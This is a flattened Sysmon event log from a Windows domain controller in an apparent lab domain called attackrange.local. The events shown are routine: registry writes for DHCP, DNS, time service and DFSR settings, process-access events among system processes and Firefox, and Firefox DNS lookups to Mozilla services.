14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpSubnetMask255.255.255.0 13241300x800000000000000018677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpIPAddress10.0.1.14 13241300x800000000000000018676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpInterfaceOptionsBinary Data 10341000x800000000000000018691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:59.634{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000018690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:59.634{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000018715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000018714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x800000000000000018713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x800000000000000018712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x800000000000000018711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x800000000000000018710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x800000000000000018709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x800000000000000018708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x800000000000000018707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x800000000000000018706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x800000000000000018705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x800000000000000018704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-495 10341000x800000000000000018703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:00.889{59A5CD1D-8E44-6005-0B00-00000000A301}8561060C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x800000000000000018702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.887{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000018701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000018700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001b9dd3) 13241300x800000000000000018699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed9a-0x634cca25) 13241300x800000000000000018698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda2-0xc5113225) 13241300x800000000000000018697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edab-0x26d59a25) 13241300x800000000000000018696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000018695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001b9dd3) 13241300x800000000000000018694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed9a-0x6329a7e5) 13241300x800000000000000018693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda2-0xc4ee0fe5) 13241300x800000000000000018692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edab-0x26b277e5) 22542200x800000000000000018716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:59.862{59A5CD1D-8E56-6005-2E00-00000000A301}24641.1.0.10.in-addr.arpa.0type: 12 ip-10-0-1-1.eu-central-1.compute.internal;C:\Windows\sysmon64.exe 22542200x800000000000000018721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.479{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net054.230.183.34;54.230.183.110;54.230.183.119;54.230.183.6;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.479{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;::ffff:54.230.183.6;::ffff:54.230.183.34;::ffff:54.230.183.110;::ffff:54.230.183.119;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.304{59A5CD1D-945A-6005-3305-00000000A301}7052classify-client.services.mozilla.com0type: 5 prod-classifyclient.normandy.prod.cloudops.mozgcp.net;34.98.75.36;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.271{59A5CD1D-945A-6005-3305-00000000A301}7052normandy-cdn.services.mozilla.com052.222.177.21;52.222.177.92;52.222.177.101;52.222.177.108;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.270{59A5CD1D-945A-6005-3305-00000000A301}7052normandy.cdn.mozilla.net0type: 5 normandy-cdn.services.mozilla.com;::ffff:52.222.177.108;::ffff:52.222.177.21;::ffff:52.222.177.92;::ffff:52.222.177.101;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:04.036{59A5CD1D-8E56-6005-2E00-00000000A301}2464108.177.222.52.in-addr.arpa.0type: 12 server-52-222-177-108.ham50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.481{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net02600:9000:2057:f400:a:da5e:7900:93a1;2600:9000:2057:1c00:a:da5e:7900:93a1;2600:9000:2057:2a00:a:da5e:7900:93a1;2600:9000:2057:2c00:a:da5e:7900:93a1;2600:9000:2057:5600:a:da5e:7900:93a1;2600:9000:2057:8200:a:da5e:7900:93a1;2600:9000:2057:8600:a:da5e:7900:93a1;2600:9000:2057:9400:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:15.727{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:15.727{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:18.055{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:18.055{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:18.055{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:18.055{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:22.727{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:30.367{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000018734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:31.414{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x800000000000000018733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:31.414{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x800000000000000018732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:31.414{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 13241300x800000000000000018735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:35.648{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda2-0xda45a624) 10341000x800000000000000018736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:39.242{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:41.993{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-957C-6005-5D05-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 